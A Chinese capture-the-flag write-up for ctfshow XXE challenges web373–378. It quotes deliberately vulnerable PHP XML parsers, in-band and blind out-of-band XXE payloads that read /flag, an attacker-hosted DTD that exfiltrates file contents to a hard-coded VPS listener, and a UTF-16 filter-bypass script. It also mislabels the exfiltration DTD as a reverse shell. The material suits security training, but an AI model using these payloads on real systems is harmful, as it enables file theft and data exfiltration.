web373
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2021-01-07 12:59:52
# @Last Modified by: h1xa
# @Last Modified time: 2021-01-07 13:36:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$ctfshow = $creds->ctfshow;
echo $ctfshow;
}
highlight_file(__FILE__);
echo $ctfshow;
他这里的输出是ctfshow 那我们的标签就是ctfshow 设置其他的他不会输出
web374 远程
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2021-01-07 12:59:52
# @Last Modified by: h1xa
# @Last Modified time: 2021-01-07 13:36:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);
和上题的代码差别不大 ,但是没有输出了,无回显数据
要使用远程服务器 加载 dtd文件
在vps上创建一个test.dtd文件,用于反弹shell,内容如下
<!ENTITY % dtd "<!ENTITY % xxe SYSTEM 'http://47.236.41.52:1234/%file;'> ">
%dtd;
%xxe;
监听 1234端口
POST发包内容
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://47.236.41.52/test.dtd">
%aaa;
]>
<root>1</root>
VPS收到flag的base64
web375
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/', $xmlfile)){
die('error');
}
if(isset($xmlfile)){
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);
过滤了这个
if(preg_match('/<\?xml version="1\.0"/', $xmlfile)){
die('error');
}
输入的内容不能带那个
以及可以使用这个payload
<!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % aaa SYSTEM "http://47.236.41.52/test.dtd"> %aaa; ]> <root>123</root>
NC监听
web 376 和上题一样
web 377 payload utf-16 编码
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"|http/i', $xmlfile)){
die('error');
}
if(isset($xmlfile)){
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);
这里他不能带有 http了
上面的payload 不行了
要绕过 http 就要进行编码绕过 编码为 utf-16
脚本
import requests
url = "http://9ee720e9-0a8c-45d3-ae58-3cb03a363de7.challenge.ctf.show/"
payload = """
<!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % aaa SYSTEM "http://47.236.41.52/test.dtd"> %aaa; ]> <root>123</root>
"""
head = {"Content-Type": "application/x-www-form-urlencoded"}
r = requests.post(url=url,data=payload.encode("utf-16"),headers=head)
print(r.text)
就获取到flag了
web378
常见的一个靶场
POST /doLogin HTTP/1.1
Host: 731b50d9-7186-4726-9a37-40d372e37794.challenge.ctf.show
Content-Length: 148
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Content-Type: application/xml;charset=UTF-8
Origin: http://731b50d9-7186-4726-9a37-40d372e37794.challenge.ctf.show
Referer: http://731b50d9-7186-4726-9a37-40d372e37794.challenge.ctf.show/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///flag">
]>
<user><username>&f;</username><password>admin</password></user>
查看flag的payload